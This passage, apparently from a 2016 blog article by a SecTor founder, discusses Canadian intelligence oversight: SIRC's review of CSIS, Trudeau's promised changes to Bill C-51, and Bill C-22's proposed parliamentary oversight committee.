Traditionally, the body responsible for overseeing CSIS has been the Security Intelligence Review Committee (SIRC).

This body typically reviewed a sample of CSIS warrant applications, but in its annual report for 2014-15, it explained that it would have to broaden its review activities to cope with the new powers granted to CSIS under C-51.

The Harper Government had already earmarked additional funding to help with this in its 2015 Economic Action Plan. SIRC explained that it had broadened its scope to cover CSIS’ use of metadata, and had found it wanting in areas including training, policy and procedure, investigative thresholds, and recording its decision-making.
SIRC had made some key recommendations in this area that CSIS had not taken up, the report said. Trudeau’s concern was that SIRC described itself as a review body, examining past activities, rather than an oversight body, monitoring CSIS operations in real time. The Liberal leader vowed to alter this and started to make good on this promise in early 2016. His public safety minister Ralph Goodale has now introduced Bill C-22, which would create a cross-party oversight committee that would oversee almost 20 agencies related to national security.

Mandatory review period

The second problem that Trudeau had with C-51 was with the bill’s scope. He promised to refine some of its language to omit legal protests and advocacy from definition as terrorist activities, and said that he would introduce a mandatory review period for the legislation. He hasn’t taken these steps at the time of writing, and privacy advocates are awaiting the government’s next move.
In the interim, Trudeau has been shuffling. One notable political action was his appointment of a new national security advisor, Daniel Jean, in May this year. Jean replaces former Harper government National Security Advisor Richard Fadden, an ex-director of CSIS, who recently retired. Jean doesn’t come from the spy community, moving up instead from his role as deputy minister of foreign affairs.

Before that, he served in Heritage Canada and the Treasury Board.

That may point to a more international intelligence focus at the top and a move away from more hardline domestic intelligence policies.
It could be taken as an indicator that the Trudeau government intends to calibrate Bill C-51 to bring it more in line with its new focus. All this will still be guesswork until Trudeau actually takes steps to change the legislation.

An attempt at proper oversight may appease privacy advocates a little, but we still don’t know what will happen to the government’s electronic surveillance powers until a minister stands up in parliament with a proposed amendment. Even when that happens, it’s unlikely to satisfy privacy advocates who have always called for the repeal of C-51, but they’re unlikely to get much more.

After all, the Trudeau government never promised to do away with the thing altogether. Don’t forget, Edward Snowden will be speaking via video link at the SecTor security conference on October 18, so post your questions in the comments section below.

Bruce Cowper is a founding member of the Security Education Conference Toronto (SecTor), the Toronto Area Security Klatch (TASK), the Ottawa Area Security Klatch (OASK) and an active member of numerous organizations across North America. In his day job, Bruce works for ...